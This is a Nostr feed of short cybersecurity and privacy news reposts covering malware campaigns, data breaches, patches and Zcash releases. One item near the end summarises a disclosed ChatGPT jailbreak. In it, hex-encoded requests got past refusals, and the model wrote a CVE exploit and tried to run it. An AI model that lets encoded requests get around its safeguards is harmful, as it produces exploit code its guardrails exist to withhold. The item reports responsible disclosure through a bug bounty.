Oddbean new post about | logout

Notes by zCat | export

 Zcash Zebra implementation walkthrough for developers from the Zcash foundation

See more:
https://youtu.be/aV93Ux3j4Gw

#zcash #privacy 
 Germany drafts law to protect researchers who find security flaws

The Federal Ministry of Justice in Germany has drafted a law to provide legal protection to security researchers who discover and responsibly report security vulnerabilities to vendors.

When security research is conducted within the specified boundaries, those responsible will be excluded from criminal liability and the risk of prosecution.

"Those who want to close IT security gaps deserve recognition—not a letter from the prosecutor," stated Federal Minister of Justice Dr. Marco Buschmann.

See more: https://www.bleepingcomputer.com/news/security/germany-drafts-law-to-protect-researchers-who-find-security-flaws/

#cybersecurity 
 New SteelFox malware hijacks Windows PCs using vulnerable driver

A new malicious package called 'SteelFox' mines for cryptocurrency and steals credit card data by using the “bring your own vulnerable driver” technique to get SYSTEM privileges on Windows machines.

The malware bundle dropper is distributed through forums and torrent trackers as a crack tool that activates legitimate versions of various software like Foxit PDF Editor, JetBrains and AutoCAD.

Using a vulnerable driver for privilege escalation is common for state-sponsored threat actors and ransomware groups. However, the technique now appears to extend to info-stealing malware attacks.

See more: https://www.bleepingcomputer.com/news/security/new-steelfox-malware-hijacks-windows-pcs-using-vulnerable-driver/

#cybersecurity #malware 
 VEILDrive Attack Exploits Microsoft Services to Evade Detection and Distribute Malware

An ongoing threat campaign dubbed VEILDrive has been observed taking advantage of legitimate services from Microsoft, including Teams, SharePoint, Quick Assist, and OneDrive, as part of its modus operandi.

"Leveraging Microsoft SaaS services — including Teams, SharePoint, Quick Assist, and OneDrive — the attacker exploited the trusted infrastructures of previously compromised organizations to distribute spear-phishing attacks and store malware," Israeli cybersecurity company Hunters said in a new report.

"This cloud-centric strategy allowed the threat actor to avoid detection by conventional monitoring systems."

See more: https://thehackernews.com/2024/11/veildrive-attack-exploits-microsoft.html

#cybersecurity #malware 
 Winos4.0 Malware Found in Game Apps, Targets Windows Users

A new malicious software framework, “Winos4.0,” has been discovered embedded in game-related applications targeting Windows users.

According to researchers at FortiGuard Labs, this malware framework is a sophisticated variant derived from Gh0strat. Winos4.0 can execute multiple actions remotely and provides attackers with extensive control over affected systems.

The malware operates by distributing game-related applications, such as installation tools and performance boosters, to gain initial access to target devices.

See more: https://www.infosecurity-magazine.com/news/winos40-malware-found-game-windows/

#cybersecurity #malware 
 South Korea Fines Meta $15.67M for Illegally Sharing Sensitive User Data with Advertisers

Meta has been fined 21.62 billion won ($15.67 million) by South Korea's data privacy watchdog for illegally collecting sensitive personal information from Facebook users, including data about their political views and sexual orientation, and sharing it with advertisers without their consent.

The country's Personal Information Protection Commission (PIPC) said Meta gathered information such as religious affiliations, political views, and same-sex marital status of about 980,000 domestic Facebook users and shared it with 4,000 advertisers.

"Specifically, it was found that behavioral information, such as the pages that users 'liked' on Facebook and the ads they clicked on, was analyzed to create and operate advertising topics related to sensitive information," the PIPC said in a press statement.

See more: https://thehackernews.com/2024/11/south-korea-fines-meta-1567m-for.html

#privacy #meta 
 Google Cloud to make MFA mandatory by the end of 2025

Google has announced that multi-factor authentication (MFA) will be mandatory on all Cloud accounts by the end of 2025 to enhance security.

Google Cloud is a product designed for businesses, developers, and IT teams to build, deploy, and manage applications and infrastructure in the cloud.

The mandatory MFA rollout will affect both admins and any users with access to Google Cloud services but not general consumer Google accounts.

See more: https://www.bleepingcomputer.com/news/security/google-cloud-to-make-mfa-mandatory-by-the-end-of-2025/

#cybersecurity #google #mfa 
 ClickFix Exploits Users with Fake Errors and Malicious Code

A new social engineering tactic, known as ClickFix, has emerged, using deceptive error messages to prompt users to run harmful code.

The Sekoia Threat Detection & Research (TDR) team has recently detailed this tactic – first discovered by Proofpoint in March – in a new report published earlier today. This approach, called ClearFake, encourages users to copy and execute malicious PowerShell commands, enabling cybercriminals to infect users’ devices.

ClickFix exploits fake error messages across multiple platforms, such as Google Meet and Zoom, often mimicking error notifications on video conferencing pages to lure users.

See more: https://www.infosecurity-magazine.com/news/clickfix-fake-errors-malicious-code/

#cybersecurity #clickfix 
 Chinese Air Fryers May Be Spying on Consumers, Which? Warns

A consumer rights group has warned UK shoppers to research their next electronics purchases carefully, after finding evidence of “excessive smart device surveillance” from Chinese air fryers and other products.

Which? claimed that smart air fryers from Xiaomi, Cosori and Aigostar all wanted to know customers’ precise locations, as well as permission to record audio on the user’s phone.

The Xiaomi app linked to the smart device also connected to ad trackers from Facebook, TikTok’s Pangle ad network and Tencent, depending on the location of said user, the report claimed.

See more: https://www.infosecurity-magazine.com/news/chinese-air-fryers-spying/

#cybersecurity #privacy 
 Pakistani Hackers Targeted High-Profile Indian Entities using Custom RAT

A hacking group associated with the Pakistani government has repeatedly targeted high-profile entities in India with cyber espionage campaigns throughout 2024, according to cybersecurity provider Check Point.

Researchers at Check Point Research are closely tracking the persistent use of ElizaRAT, a custom implant deployed by Transparent Tribe, a cyber espionage group attributed to Pakistan, also known as APT36.

They observed several campaigns using the remote access trojan (RAT) in 2024, with many likely successful.

See more: https://www.infosecurity-magazine.com/news/pakistan-hackers-high-profile/

#cybersecurity 
 Interpol disrupts cybercrime activity on 22,000 IP addresses, arrests 41

Interpol announced it arrested 41 individuals and taken down 1,037 servers and infrastructure running on 22,000 IP addresses facilitating cybercrime in an international law enforcement action titled Operation Synergia II.

The operation took place between April and August 2024, spanning 95 countries and resulting in 41 arrests of those linked to various crimes, including ransomware, phishing, and information stealers.

Interpol said its enforcement action was backed by intelligence provided by private cybersecurity firms like Group-IB, Kaspersky, Trend Micro, and Team Cymru, leading to the identification of over 30,000 suspicious IP addresses.

See more: https://www.bleepingcomputer.com/news/security/interpol-disrupts-cybercrime-activity-on-22-000-ip-addresses-arrests-41/

#cybersecurity  
 Suspect behind Snowflake data-theft attacks arrested in Canada

Canadian authorities have arrested a man suspected of having stolen the data of hundreds of millions after targeting over 165 organizations, all of them customers of cloud storage company Snowflake.

According to Canada's Department of Justice, Alexander "Connor" Moucka (aka "Waifu" and "Judische") was taken into custody on Wednesday at the request of the United States and is scheduled to appear in court again today, as first reported by Bloomberg and confirmed by 404 Media.

"Following a request by the United States, Alexander Moucka (a.k.a. Connor Moucka) was arrested on a provisional arrest warrant on Wednesday October 30, 2024," Ian McLeod, a spokesperson for Canada's Department of Justice, told BleepingComputer on Tuesday.

See more: https://www.bleepingcomputer.com/news/security/suspect-behind-snowflake-data-theft-attacks-arrested-in-canada/

#cybersecurity #hacking 
 Researcher Discloses 36 Vulnerabilities Found in IBM Security Verify Access 

Security researcher Pierre Barre has drawn attention to three dozen vulnerabilities in IBM Security Verify Access (ISVA), including ones that could have allowed attackers to compromise the entire authentication infrastructure based on the authorization and network security policy management solution.

An attacker looking to exploit these issues would need to mount a man-in-the-middle (MiTM) attack or gain access to the internal network of an organization using IBM’s ISVA appliances and Docker images.

At least half of the security defects, including seven remote code execution flaws, one authentication bypass, eight privilege escalation bugs, and some other issues, could be exploited for full compromise.

See more: https://www.securityweek.com/researcher-discloses-32-vulnerabilities-found-in-ibm-security-verify-access/

#cybersecurity #ibm 
 Synology Urges Patch for Critical Zero-Click RCE Flaw Affecting Millions of NAS Devices

Taiwanese network-attached storage (NAS) appliance maker Synology has addressed a critical security flaw impacting DiskStation and BeePhotos that could lead to remote code execution.

Tracked as CVE-2024-10443 and dubbed RISK:STATION by Midnight Blue, the zero-day flaw was demonstrated at the Pwn2Own Ireland 2024 hacking contest by security researcher Rick de Jager.

RISK:STATION is an "unauthenticated zero-click vulnerability allowing attackers to obtain root-level code execution on the popular Synology DiskStation and BeeStation NAS devices, affecting millions of devices," the Dutch company said.

See more: https://thehackernews.com/2024/11/synology-urges-patch-for-critical-zero.html

#cybersecurity #zeroclick 
 OWASP Beefs Up GenAI Security Guidance Amid Growing Deepfakes

As businesses worry over deepfake scams and other AI attacks, organizations are adding guidance for cybersecurity teams on how to detect, and respond to, next-generation threats. That includes Exabeam, which was recently targeted by a deepfaked job candidate.

To help organizations develop stronger defenses against AI-based attacks, the Top 10 for LLM Applications & Generative AI group within the Open Worldwide Application Security Project (OWASP) released a trio of guidance documents for security organizations on Oct. 31. To its previously released AI cybersecurity and governance checklist, the group added a guide for preparing for deepfake events, a framework to create AI security centers of excellence, and a curated database on AI security solutions.

See more: https://www.darkreading.com/vulnerabilities-threats/owasp-genai-security-guidance-growing-deepfakes

#cybersecurity #ai #deepfake 
 Windows infected with backdoored Linux VMs in new phishing attacks

A new phishing campaign dubbed 'CRON#TRAP' infects Windows with a Linux virtual machine that contains a built-in backdoor to give stealthy access to corporate networks.

Using virtual machines to conduct attacks is nothing new, with ransomware gangs and cryptominers using them to stealthily perform malicious activity. However, threat actors commonly install these manually after they breach a network.

A new campaign spotted by Securonix researchers is instead using phishing emails to perform unattended installs of Linux virtual machines to breach and gain persistence on corporate networks.

The phishing emails pretend to be a "OneAmerica survey" that includes a large 285MB ZIP archive to install a Linux VM with a pre-installed backdoor.

See more: https://www.bleepingcomputer.com/news/security/windows-infected-with-backdoored-linux-vms-in-new-phishing-attacks/

#cybersecurity #windows 
 Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System

Google has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild.

The vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories and its sub-directories, according to a code commit message.

The tech giant has also flagged CVE-2024-43047, a now-patched security bug in Qualcomm chipsets, as having been actively exploited. A use-after-free vulnerability in the Digital Signal Processor (DSP) Service, successful exploitation could lead to memory corruption.

See more: https://thehackernews.com/2024/11/google-warns-of-actively-exploited-cve.html

#cybersecurity #android 
 Nokia investigates breach after hacker claims to steal source code

Nokia is investigating whether a third-party vendor was breached after a hacker claimed to be selling the company's stolen source code.

IntelBroker claimed to be selling Nokia source code that was stolen after they breached a third-party vendor's server.

IntelBroker states that the stolen data contains SSH keys, source code, RSA keys, BitBucket logins, SMTP accounts, webhooks, and hardcoded credentials.

The threat actor told BleepingComputer that they gained access to the third-party vendor's SonarQube server using default credentials, allowing them to download customers' Python projects, including those belonging to Nokia.

See more: https://www.bleepingcomputer.com/news/security/nokia-investigates-breach-after-hacker-claims-to-steal-source-code/

#cybersecurity #databreach 
 Zcashd 5.1.0 EOS halt tomorrow - upgrade your nodes if you run Zcashd implementation!

See more:
https://github.com/zcash/zcash/releases/tag/v6.0.0

Original tweet:
https://x.com/zksquirrel/status/1853543902747279382

#zcash #zcashd 
 The Zcash Foundation released the version of Zebra, version 2.0.1, with full support for NU6 on Mainnet. Please update your nodes

Zebra now implements all suggestions from the audit provided by LeastAuthority. Another notable feature is the addition of cookie-based authentication for Zebra’s RPC server.

Finally, the end-of-support (EOS) halt goes back to occurring 16 weeks from the release date.

See more:
https://zfnd.org/zebra-2-0-1-release/

#Zcash #Zebra 
 Okta used to allow login bypass for any usernames with 52+ characters. 

This vulnerability was resolved in Okta's production environment on October 30, 2024

See more: 
https://trust.okta.com/security-advisories/okta-ad-ldap-delegated-authentication-username/

#cybersecurity 
 Hackers Leak 300,000 MIT Technology Review Magazine User Records

Hackers claim to have breached MIT Technology Review Magazine via a third-party contractor, leaking nearly 300,000 user records on Breach Forums. Data includes full names, email addresses, and activity details, posing risks for phishing and targeted scams.

See more: https://hackread.com/hackers-leak-mit-technology-review-user-records/

#cybersecurity #privacy 
 City of Columbus: Data of 500,000 stolen in July ransomware attack

The City of Columbus, Ohio, notified 500,000 individuals that a ransomware gang stole their personal and financial information in a July 2024 cyberattack.

See more: https://www.bleepingcomputer.com/news/security/city-of-columbus-data-of-500-000-stolen-in-july-ransomware-attack/

#cybersecurity #ransomware 
 Supply Chain Attack Uses Smart Contracts for C2 Ops

Security researchers claim to have discovered the first-ever open source supply chain attack combining blockchain technology with traditional attack vectors.

“The attacker used a classic typosquatting technique by misspelling ‘fetch’ as ‘fet’ while maintaining the key terms ‘jest’ and ‘mock,’” it wrote.

“Given that the legitimate packages are primarily used in development environments where developers typically have elevated system privileges, and are often integrated into CI/CD pipelines, we believe this attack specifically targets development infrastructure through the compromise of testing environments.”

See more: https://www.infosecurity-magazine.com/news/supply-chain-attack-smart/

#cybersecurity #smartcontract #supplychainattack 
 Malware Campaign Uses Ethereum Smart Contracts to Control npm Typosquat Packages

An ongoing campaign is targeting npm developers with hundreds of typosquat versions of their legitimate counterparts in an attempt to trick them into running cross-platform malware.

The attack is notable for utilizing Ethereum smart contracts for command-and-control (C2) server address distribution, according to independent findings from Checkmarx, Phylum, and Socket published over the past few days.

The activity was first flagged on October 31, 2024, although it's said to have been underway at least a week prior. No less than 287 typosquat packages have been published to the npm package registry.

See more: https://thehackernews.com/2024/11/malware-campaign-uses-ethereum-smart.html

nostr:nevent1qqsq8w6hg6zau75efs45zj03v7us74xm4pawuu69ng0flrczffr9j2cpz4mhxue69uhhyetvv9ujumn0wd68ytnzvuhsygqkl5n0qqz57es4r34a0yj7mm6ptpss8tce63zlj0mx7h3ykdzz0gpsgqqqqqqsy4r3nr

#cybersecurity #c2 #smartcontracts 
 DocuSign's Envelopes API abused to send realistic fake invoices

Threat actors are abusing DocuSign's Envelopes API to create and mass-distribute fake invoices that appear genuine, impersonating well-known brands like Norton and PayPal.

Using a legitimate service, the attackers bypass email security protections as they come from an actual DocuSign domain, docusign.net.

The goal is to have their targets e-sign the documents, which they can then use to authorize payments independently from the company's billing departments.

"If users e-sign this document, the attacker can use the signed document to request payment from the organization outside of DocuSign or send the signed document through DocuSign to the finance department for payment," explains Wallarm security researcher.

See more: https://www.bleepingcomputer.com/news/security/docusigns-envelopes-api-abused-to-send-realistic-fake-invoices/

#cybersecurity #docusign #phishing 
 Google’s AI Tool Big Sleep Finds Zero-Day Vulnerability in SQLite Database Engine

Google said it discovered a zero-day vulnerability in the SQLite open-source database engine using its large language model (LLM) assisted framework called Big Sleep (formerly Project Naptime).

The tech giant described the development as the "first real-world vulnerability" uncovered using the artificial intelligence (AI) agent, while the researchers were not able to find the same vulnerability using traditional fuzzing. 

"We believe this is the first public example of an AI agent finding a previously unknown exploitable memory-safety issue in widely used real-world software," the Big Sleep team said in a blog post shared with The Hacker News.

The vulnerability in question is a stack buffer underflow in SQLite, which occurs when a piece of software references a memory location prior to the beginning of the memory buffer, thereby resulting in a crash or arbitrary code execution.

The flaw was discovered in a development branch of the library, meaning it was flagged before it made it into an official release.

See more:
The Hackers News https://thehackernews.com/2024/11/googles-ai-tool-big-sleep-finds-zero.html

SecurityWeek:
https://www.securityweek.com/google-says-its-ai-found-sqlite-vulnerability-that-fuzzing-missed/

#cybersecurity #sqlite #ai 
 Meet Interlock — The new ransomware targeting FreeBSD servers

A relatively new ransomware operation named Interlock attacks organizations worldwide, taking the unusual approach of creating an encryptor to target FreeBSD servers.

Launched at the end of September 2024, Interlock has since claimed attacks on six organizations, publishing stolen data on their data leak site after a ransom was not paid. One of the victims is Wayne County, Michigan, which suffered a cyberattack at the beginning of October.

Not much is known about the ransomware operation, with some of the first information coming from incident responder Simo in early October, who found a new backdoor [VirusTotal] deployed in an Interlock ransomware incident.

See more: https://www.bleepingcomputer.com/news/security/meet-interlock-the-new-ransomware-targeting-freebsd-servers/

#cybersecurity #ransomware 
 In Other News: FBI’s Ransomware Disruptions, Recall Delayed Again, CrowdStrike Responds to Bloomberg Article

SecurityWeek sums up last week's news in the brief overview. Check if you have missed anything important 👀

See more: https://www.securityweek.com/in-other-news-fbis-ransomware-disruptions-recall-delayed-again-crowdstrike-responds-to-bloomberg-article/

#cybersecurity 
 GreyNoise Credits AI for Spotting Exploit Attempts on IoT Livestream Cams

Cybersecurity firm GreyNoise Intelligence is crediting an AI-powered tool for capturing attempts to exploit critical vulnerabilities in live streaming IoT cameras widely deployed at healthcare, industrial operations and government facilities. 

GreyNoise said it detected two distinct vulnerabilities — CVE-2024-8956 and CVE-2024-8957 — after an exploit attempt on its Sift automated threat-hunting honeypot system. An internal AI technology flagged the unusual activity which allows GreyNoise researchers discovered the zero-day vulnerabilities. 

The most severe of the two vulnerabilities (CVE-2024-8956) carries a CVSS score of 9.1 out of 10 and allows an attacker to access sensitive information like usernames, MD5 password hashes, and configuration data. 

See more: https://www.securityweek.com/greynoise-credits-ai-for-spotting-exploit-attempts-on-iot-livestream-cams/

#cybersecurity #ai 
 Critical Auth Bugs Expose Smart Factory Gear to Cyberattack

Critical security vulnerabilities affecting factory automation software from Mitsubishi Electric and Rockwell Automation could variously allow remote code execution (RCE), authentication bypass, product tampering, or denial-of-service (DoS).

That's according to the US Cybersecurity and Infrastructure Security Agency (CISA), which warned yesterday that an attacker could exploit the Mitsubishi Electric bug (CVE-2023-6943, CVSS score of 9.8) by calling a function with a path to a malicious library while connected to the device — resulting in authentication bypass, RCE, DoS, or data manipulation.

The Rockwell Automation bug (CVE-2024-10386, CVSS 9.8), meanwhile, stems from a missing authentication check; a cyberattacker with network access could exploit it by sending crafted messages to a device, potentially resulting in database manipulation.

See more: https://www.darkreading.com/vulnerabilities-threats/critical-auth-bugs-smart-factory-cyberattack

#cybersecurity 
 LastPass warns of fake support centers trying to steal customer data

LastPass is warning about an ongoing campaign where scammers are writing reviews for its Chrome extension to promote a fake customer support phone number. However, this phone number is part of a much larger campaign to trick callers into giving scammers remote access to their computers, as discovered by BleepingComputer.

LastPass is a popular password manager that utilizes a LastPass Chrome extension to generate, save, manage, and autofill website passwords.

Threat actors are attempting to target a large swath of the company's user base by leaving 5-star reviews with a fake LastPass customer support number.

See more: https://www.bleepingcomputer.com/news/security/lastpass-warns-of-fake-support-centers-trying-to-steal-customer-data/

#cybersecurity #lastpass 
 Zero-Click Flaw Exposes Potentially Millions of Popular Storage Devices to Attack

A vulnerability categorized as “critical” in a photo app installed by default on Synology network-attached storage devices could give attackers the ability to steal data and worse.

A popular device and application used by millions of individuals and businesses around the world to store documents is vulnerable to a zero-click flaw, a group of Dutch researchers have discovered.

The vulnerability, which is called zero-click because it doesn’t require a user to click on anything to be infected, affects a photo application installed by default on popular network-attached storage (NAS) devices made by the Taiwanese firm Synology. The bug would allow attackers to gain access to the devices to steal personal and corporate files, plant a backdoor, or infect the systems with ransomware to prevent users from accessing their data.

See more: https://www.wired.com/story/synology-zero-click-vulnerability/

#cybersecurity #zeroclick 
 Zcash explores proposal of transition into hybrid Proof- of-work/Proof-of-stake system called Crosslink

See more:
https://github.com/ShieldedLabs/crosslink-deployment/blob/main/Scoping.md

YouTube:
https://www.youtube.com/live/O4wQi_i7k0I

#zcash #zec #privacy 
 qBittorrent fixes flaw exposing users to MitM attacks for 14 years

qBittorrent has addressed a remote code execution flaw caused by the failure to validate SSL/TLS certificates in the application's DownloadManager, a component that manages downloads throughout the app.

The flaw, introduced in a commit on April 6, 2010, was eventually fixed in the latest release, version 5.0.1, on October 28, 2024, more than 14 years later.

However, as security researcher Sharp Security highlighted in a blog post, the team fixed a notable flaw without adequately informing the users about it and without assigning a CVE to the problem.

See more: https://www.bleepingcomputer.com/news/security/qbittorrent-fixes-flaw-exposing-users-to-mitm-attacks-for-14-years/

#cybersecurity #torrent 
 Couple of Windows related news. Bugs, patches and money milking grift. Microsoft being Microsoft 🤷‍♂️

1) Windows 11 Task Manager bug shows wrong number of running processes
See more: https://www.bleepingcomputer.com/news/microsoft/windows-11-task-manager-bug-shows-wrong-number-of-running-processes/

2) Microsoft fixes Windows 10 bug causing apps to stop working
See more: https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-10-bug-causing-apps-to-stop-working/

3) Microsoft wants $30 if you want to delay Windows 11 switch 
See more: https://www.bleepingcomputer.com/news/microsoft/microsoft-wants-30-if-you-want-to-delay-windows-11-switch/

#windows 
 Hackers target critical zero-day vulnerability in PTZ cameras 

See more: https://www.bleepingcomputer.com/news/security/hackers-target-critical-zero-day-vulnerability-in-ptz-cameras/

#cybersecurity #privacy 
 Sophos reveals 5-year battle with Chinese hackers attacking network devices

Sophos disclosed today a series of reports dubbed "Pacific Rim" that detail how the cybersecurity company has been sparring with Chinese threat actors for over 5 years as they increasingly targeted networking devices worldwide, including those from Sophos.

Sophos believes that many of the zero-day vulnerabilities are developed by Chinese researchers who not only share them with vendors, but also the Chinese government and associated state-sponsored threat actors.

While many of these attacks put cybersecurity researchers on the defensive, Sophos also had the opportunity to go on the offensive, planting custom implants on devices that were known to be compromised.

These implants allowed Sophos to collect valuable data about the threat actors, including a UEFI bootkit that was observed being deployed to a networking device.

See more: https://www.bleepingcomputer.com/news/security/sophos-reveals-5-year-battle-with-chinese-hackers-attacking-network-devices/

#cybersecurity #sophos 
 NCSC Details ‘Pygmy Goat’ Backdoor Planted on Hacked Sophos Firewall Devices

The UK’s National Cyber Security Centre (NCSC) has published technical documentation of a sophisticated network backdoor being planted on hacked Sophos XG firewall devices and warned that the malware was designed for a broader range of Linux-based network devices.

The backdoor, called Pygmy Goat, uses multiple stealthy techniques to maintain persistence and avoid detection and is capable of disguising malicious traffic as legitimate SSH connections.

The backdoor also makes use of encrypted ICMP packets for covert communication and is clearly the work of a very skilled, professional hacking operator.

See more:
https://www.securityweek.com/ncsc-details-pygmy-goat-backdoor-planted-on-hacked-sophos-firewall-devices/

Original post:
nostr:nevent1qqspaz8g27364sch6ue7nfjwqmn4vy4dwcpk9r9wpmx3farkq8q8m2gppemhxue69uhkummn9ekx7mp0qgspdlfx7qq9fanp28rt67f9ahh5zkrpqwh3n4z9lylkda0zfv6yy7srqsqqqqqpn7e6gx

#cybersecurity #sophos 
 Tails 6.9 is out! It updates Tor Browser to 14.0.1 and fixes some reliability issues in automatic upgrades.

Changes and updates
- Update Tor Browser to 14.0.1.
- Update the Tor client to 0.4.8.13.
- Update Thunderbird to 115.16.0.

See more
https://tails.net/news/version_6.9/

#privacy #tails #tor 
 Fake Meta Ads Hijacking Facebook Accounts to Spread SYS01 Infostealer

A malvertising campaign is exploiting Meta’s platform to spread SYS01 infostealer, targeting men 45+ via fake ads for popular software. The malware steals Facebook credentials, hijacks accounts espicially those administrating business pages, and spreads further attacks globally.

See more: https://hackread.com/fake-meta-ads-hijacking-facebook-sys01-infostealer/

#cybersecurity #facebook
 
 Interbank confirms data breach following failed extortion, data leak

​Interbank, one of Peru's leading financial institutions, has confirmed a data breach after a threat actor who hacked into its systems leaked stolen data online.

Previously known as the International Bank of Peru (Banco Internacional del Perú), the company provides financial services to over 2 million customers.

See more: https://www.bleepingcomputer.com/news/security/interbank-confirms-data-breach-following-failed-extortion-data-leak/

#privacy #cybersecurity 
 FakeCall Android Trojan Evolves with New Evasion Tactics and Expanded Espionage Capabilities

The sophisticated vishing malware known as FakeCall (aka Fakecalls) has become more sophisticated. New research shows an increase in evasion and espionage capabilities for an Android malware that has been known and classified as a banking trojan largely targeting South Korea.

In addition to vishing (voice phishing), FakeCall could also capture live audio and video streams from the infected devices, allowing attackers to steal sensitive data without victim interaction.

Callie Guenther, senior manager of cyber threat research at Critical Start, told SecurityWeek, “The techniques used, such as native API utilization, advanced obfuscation, and remote surveillance, resemble TTPs seen in state-sponsored campaigns. Although not definitively attributed, these capabilities align with those observed in APT groups focused on espionage and high-value financial targeting.”

See more:
Security week:
https://www.securityweek.com/fakecall-android-trojan-evolves-with-new-evasion-tactics-and-expanded-espionage-capabilities/

Bleeping Comuper:
https://www.bleepingcomputer.com/news/security/android-malware-fakecall-now-reroutes-bank-calls-to-attackers/

#cybersecurity #vishing 
 Opera Browser Fixes Big Security Hole That Could Have Exposed Your Information

A now-patched security flaw in the Opera web browser could have enabled a malicious extension to gain unauthorized, full access to private APIs.

The attack, codenamed CrossBarking, could have made it possible to conduct actions such as capturing screenshots, modifying browser settings, and account hijacking, Guardio Labs said.

To demonstrate the issue, the company said it managed to publish a seemingly harmless browser extension to the Chrome Web Store that could then exploit the flaw when installed on Opera, making it an instance of a cross-browser-store attack.

The issue has been addressed by Opera as of September 24, 2024, following responsible disclosure. That said, this is not the first time security flaws have been identified in the browser.

See more: https://thehackernews.com/2024/10/opera-browser-fixes-big-security-hole.html

#cybersecurity #opera 
 Google and Mozilla on Tuesday announced security updates for their Chrome and Firefox web browsers, and some of the vulnerabilities they patch are potentially severe.

See more:
https://www.securityweek.com/google-patches-critical-chrome-vulnerability-reported-by-apple/

#cybersecurity #chrome #mozilla 
 Hackers steal 15,000 cloud credentials from exposed Git config files

A large-scale malicious operation named "EmeraldWhale" scanned for exposed Git configuration files to steal over 15,000 cloud account credentials from thousands of private repositories.

Git configuration files, such as /.git/config or .gitlab-ci[.]yml, are used to define various options like repository paths, branches, remotes, and sometimes even authentication information like API keys, access tokens, and passwords.

According to Sysdig, who discovered the campaign, the operation involves using automated tools that scan IP ranges for exposed Git configuration files, which may include authentication tokens.

These tokens are then used to download repositories stored on GitHub, GitLab, and BitBucket, which are scanned for further credentials.

See more: https://www.bleepingcomputer.com/news/security/hackers-steal-15-000-cloud-credentials-from-exposed-git-config-files/

#cybersecurity #git 
 Honeypot Surprise: Researchers Catch Attackers Exposing 15,000 Stolen Credentials in S3 Bucket

Sysdig researchers trace a bizarre S3 bucket misconfiguration to EmeraldWhale, exposing 1.5 terabytes of stolen credentials and script.

See more: https://www.securityweek.com/honeypot-surprise-researchers-catch-attackers-exposing-15000-stolen-credentials-in-s3-bucket/

#cybersecurity

nostr:nevent1qqszc3fufljcn06t48x7jwmuppvw0xw2kyxzvldyt9u4sx7hcxz8v0qpzpmhxue69uhkummnw3ezumt0d5hsygqkl5n0qqz57es4r34a0yj7mm6ptpss8tce63zlj0mx7h3ykdzz0gpsgqqqqqqs4uh9a7 
 LottieFiles hit in npm supply chain attack targeting users' crypto

LottieFiles announced that specific versions of its npm package carry malicious code that prompts users to connect their cryptocurrency wallets so they can be emptied.

As discovered yesterday, following multiple user reports about strange code injections, the affected versions are Lottie Web Player (“lottie-player”) 2.0.5, 2.0.6, and 2.0.7, all published yesterday.

LottieFiles quickly released a new version, 2.0.8, which is based on the clean 2.0.4, advising users to upgrade to it as soon as possible.

See more: https://www.bleepingcomputer.com/news/security/lottiefiles-hit-in-npm-supply-chain-attack-targeting-users-crypto/

#cybersecurity #crypto 
 Cybercriminals Use Webflow to Deceive Users into Sharing Sensitive Login Credentials

Cybersecurity researchers have warned of a spike in phishing pages created using a website builder tool called Webflow, as threat actors continue to abuse legitimate services like Cloudflare and Microsoft Sway to their advantage.

"The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for multiple company webmail platforms, as well as Microsoft 365 login credentials," Netskope Threat Labs researcher Jan Michael Alcantara said in an analysis.

See more: https://thehackernews.com/2024/10/cybercriminals-use-webflow-to-deceive.html

#cybersecurity #crypto #phising 
 Researchers Discover Over 70 Zero-Day Bugs at Pwn2Own Ireland

The popular hacking competition set up camp in Trend Micro’s Cork office for the first time last week, with competitors discovering and demonstrating exploits for over 70 zero-day vulnerabilities. These will now be responsibly disclosed to the relevant vendors for patching

A growing number of manufacturers are getting involved in the competition in order to place their products in front of a highly motivated bunch of ethical hackers.

For the first time, Pwn2Own welcomed Meta as a sponsor this year, although no teams were able to find a workable exploit for WhatsApp in a new Messenger App category of the competition. It is zero-click vulnerabilities like this that commercial spyware makers are notorious for finding and exploiting for their customers.

See more: https://www.infosecurity-magazine.com/news/researchers-70-zeroday-bugspwn/

#cybersecurity #zeroday 
 ChatGPT Jailbreak: Researchers Bypass AI Safeguards Using Hexadecimal Encoding and Emojis

Malicious instructions encoded in hexadecimal format could have been used to bypass ChatGPT safeguards designed to prevent misuse. 

The new jailbreak was disclosed on Monday by Marco Figueroa, gen-AI bug bounty programs manager at Mozilla, through the 0Din bug bounty program.

If a user instructs the chatbot to write an exploit for a specified CVE, they are informed that the request violates usage policies. However, if the request was encoded in hexadecimal format, the guardrails were bypassed and ChatGPT not only wrote the exploit, but also attempted to execute it “against itself”, according to Figueroa.

See more
Security Week: https://www.securityweek.com/first-chatgpt-jailbreak-disclosed-via-mozillas-new-ai-bug-bounty-program/

Dark Reading: https://www.darkreading.com/application-security/chatgpt-manipulated-hex-code

#cybersecurity #ai #chatgpt #jailbreak 
 Italian Politicians Express Alarm at Latest Data Breach Allegedly Affecting 800,000 Citizens

Italian politicians called Monday for better protection of citizens’ online data following a probe into a hacking scheme that allegedly breached law enforcement, tax authority and other sensitive public data.

According to prosecutors in Milan, the data of at least 800,000 Italians was compromised in breaches dating from 2022 by a private investigative agency that compiled dossiers for a fee on top Italian business and political figures. Prosecutors were still investigating which officials had been targeted.

See more: https://www.securityweek.com/italian-politicians-express-alarm-at-latest-data-breach-allegedly-affecting-800000-citizens/

#cybersecurity #privacy 
 Apple Patches Over 70 Vulnerabilities Across iOS, macOS, Other Products

Apple on Monday announced fresh security updates for both iOS and macOS users, addressing over 70 CVEs across its platforms, including several bugs leading to protected file system modifications.

iOS 18.1 and iPadOS 18.1 are now rolling out to mobile users with patches for 28 vulnerabilities that could lead to information leaks, the disclosure of process memory, denial-of-service, sandbox escape, modification of protected system files, heap corruption, and access to restricted files.

The tech giant points to similar outcomes and resolutions for 59 security defects that were resolved with the macOS Sequoia 15.1 update that started rolling out on Monday. The patches address 15 issues that were also addressed in iOS and several flaws in third-party dependencies.

Additionally, Apple released macOS Sonoma 14.7.1 and macOS Ventura 13.7.1 with fixes for over 40 defects each, and announced the rollout of watchOS, tvOS, and visionOS security updates as well.

See more: https://www.securityweek.com/apple-patches-over-70-vulnerabilities-across-ios-macos-other-products/

#cybersecurity #apple #ios 
 Free, France’s second largest ISP, confirms data breach after leak

Free, a major internet service provider (ISP) in France, confirmed over the weekend that hackers breached its systems and stole customer personal information.

The company, which says it had over 22.9 million mobile and fixed subscribers at the end of June, is the second-largest telecommunications company in France and a subsidiary of the Iliad Group, Europe's sixth-largest mobile operator by number of subscribers.

